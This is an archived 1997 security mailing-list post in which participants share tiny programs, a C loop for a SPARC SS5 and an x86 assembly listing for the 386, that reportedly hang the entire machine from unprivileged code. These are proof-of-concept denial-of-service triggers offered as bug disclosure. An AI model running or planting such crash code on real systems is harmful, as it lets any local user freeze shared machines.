[456] in Best-of-Security
BoS: Re: Cute SPARC CPU bug
daemon@ATHENA.MIT.EDU (Dmitry Kohmanyuk =?KOI8-R?B?5M3J1N)
Fri Nov 14 20:13:05 1997
Delivered-To: best-of-security-mtg@menelaus.mit.edu
Date: Fri, 24 Oct 1997 15:40:18 -0700
Reply-To: Dmitry Kohmanyuk =?KOI8-R?B?5M3J1NLJyiDrz8jNwc7Ayw==?= <dk@GENESYSLAB.COM>
From: Dmitry Kohmanyuk =?KOI8-R?B?5M3J1NLJyiDrz8jNwc7Ayw==?= <dk@GENESYSLAB.COM>
In-Reply-To: <199710241742.NAA07576@bikini.ai.mit.edu>; from Charles M. Hannum
on Fri, Oct 24, 1997 at 01:42:32PM -0400
Old-X-Originally-To: To: BUGTRAQ@NETSPACE.ORG
Old-X-Originated-From: From: Dmitry Kohmanyuk =?KOI8-R?B?5M3J1NLJyiDrz8jNwc7Ayw==?= <dk@GENESYSLAB.COM>
Errors-To: best-of-security-request@cyber.com.au
To: best-of-security@cyber.com.au
Resent-From: best-of-security@cyber.com.au
On Fri, Oct 24, 1997 at 01:42:32PM -0400, Charles M. Hannum wrote:
> Compile the following:
>
> main(){while(1);}
>
> with `gcc -O' on a SPARC. You get, roughly:
>
> L1:
> b,a L1
> retl
>
> Run it on a SS5/170. Notice the machine is completely wedged.
> Power-cycle it.
don't have a SS5 to crash, but just to add to CPU bugs topic...
gcc_compiled.:
.lcomm _c.0,40
.text
.align 2
.globl _main
_main:
pushl %ebp
movl %esp,%ebp
movl $0,%eax
pushaw
popaw
movl _c.0(%eax,%eax,4),%ebx
pushl $0
call _exit
leave
ret
this hangs 386 CPU solid. Non-privileged.
Change _main to main to taste.
Ah, my PDP-11 assembly days...
